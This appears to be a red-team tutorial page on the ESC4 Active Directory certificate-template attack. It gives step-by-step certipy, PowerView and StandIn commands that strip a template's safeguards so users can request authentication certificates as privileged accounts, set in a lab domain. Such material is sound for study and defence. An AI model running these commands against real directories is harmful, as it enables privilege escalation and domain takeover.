# ESC4 Performing ESC4 allows an attacker to introduce a misconfiguration to a template that is not vulnerable to begin with by abusing a certificate with overly-permissive ACLs; some rights that are critical for this abuse are: * Owner - Full Control * FullControl - Full Control * WriteOwner - Modify Owner for grant Full Control * WriteDacl - Modify access control for grant Full Control * WriteProperty - Edit any properties In order to modify a template we need to modify these values: * Grant Enrollment rights for the vulnerable template * Disable the `PEND_ALL_REQUESTS` flag in `mspki-enrollment-flag` to deactivate Manager Approval * Set the `mspki-ra-signature` attribute to `0` to disable the `Authorized Signature requirement` * Enable the `ENROLLEE_SUPPLIES_SUBJECT` flag in `mspki-certificate-name-flag` to allow requesting users to specify another privileged account name as a `SAN` * Set the `mspki-certificate-application-policy` to a certificate purpose for authentication: * Client Authentication (OID: 1.3.6.1.5.5.7.3.2) * Smart Card Logon (OID: 1.3.6.1.4.1.311.20.2.2) * PKINIT Client Authentication (OID: 1.3.6.1.5.2.3.4) * Any Purpose (OID: 2.5.29.37.0) * No Extended Key Usage (EKU) These are the steps we can take to abuse a certificate template vulnerable to ESC4: first we make the changes to the certificates we have ACLs on and save the old configuration so that we can revert the changes at a later time ``` certipy template -u otter -p 'SomethingSecure123!' -template ESC4 -save-old ``` now the `ESC4` certificate should be vulnerable to all ESC techniques from 1 to 4 (included) ``` certipy find -u otter -p 'SomethingSecure123!' -dc-ip 10.10.10.10 -vulnerable -stdout ESC1 : 'LAB.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication ESC2 : 'LAB.LOCAL\\Authenticated Users' can enroll and template can be used for any purpose ESC3 : 'LAB.LOCAL\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set ESC4 : 'LAB.LOCAL\\Authenticated Users' has dangerous permissions ``` From this point on we can abuse any of the 3 misconfigurations (either [ESC1](https://otter.gitbook.io/red-teaming/notes/adcs/esc1), [ESC2](https://otter.gitbook.io/red-teaming/notes/adcs/esc2) or [ESC3](https://otter.gitbook.io/red-teaming/notes/adcs/esc3)). To revert the changes made to the certificate template we can use the JSON file generated with the previous `certipy template` command ``` certipy template -u otter -p 'SomethingSecure123!' -template ESC4 -configuration ESC4.json ``` The `certipy template` command automates the process of setting up the misconfigurations completely but it's also possible to do it manually from a Windows host using the following commands and PowerView. 1. Add Certificate Enrollment Permissions to the `Domain Users` group ``` Add-DomainObjectAcl -TargetIdentity ESC4 -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=domain,DC=com" -Verbose ``` 2. Disable [manager approval requirement](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/ec71fd43-61c2-407b-83c9-b52272dec8a1) by setting the `PEND_ALL_REQUESTS` flag to `0x00000009` (`0x00000001 + 0x00000008` for `CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS` and `CT_FLAG_PUBLISH_TO_DS`) ``` Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-enrollment-flag'=9} -Verbose ``` 3. Disable Authorized Signature Requirement by setting the `mspki-ra-signature` attribute to `0` ``` Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-ra-signature'=0} -Verbose ``` 4. Enabling SAN Specification making the template vulnerable to [ESC1](https://otter.gitbook.io/red-teaming/notes/adcs/esc1) by setting the [ENROLLEE\_SUPPLIES\_SUBJECT](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/1192823c-d839-4bc3-9b6b-fa8c53507ae1) flag to `1` ``` Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-certificate-name-flag'=1} -Verbose ``` 5. Adding PKI Extended Key Usage EKU and `mspki-certificate-application-policy` ``` Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'pkiextendedkeyusage'='1.3.6.1.5.5.7.3.2'} -Verbose Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose ``` We can also do the same thing with `StandIn`, the following are the commands used to introduce a ESC1 misconfiguration into a certificate. * Adding `ENROLLEE_SUPPLIES_SUBJECT` ``` .\StandIn.exe --ADCS --filter SecureUpdate --ess --add ``` * Add Certificate Enrollment Permissions to the `Domain Users` group ``` .\StandIn.exe --ADCS --filter SecureUpdate --ntaccount "DOMAIN\domain users" --enroll --add ``` * Adding an EKU (in this case we'll use the Client Authentication EKU): ``` .\StandIn.exe --ADCS --filter SecureUpdate --clientauth --add ```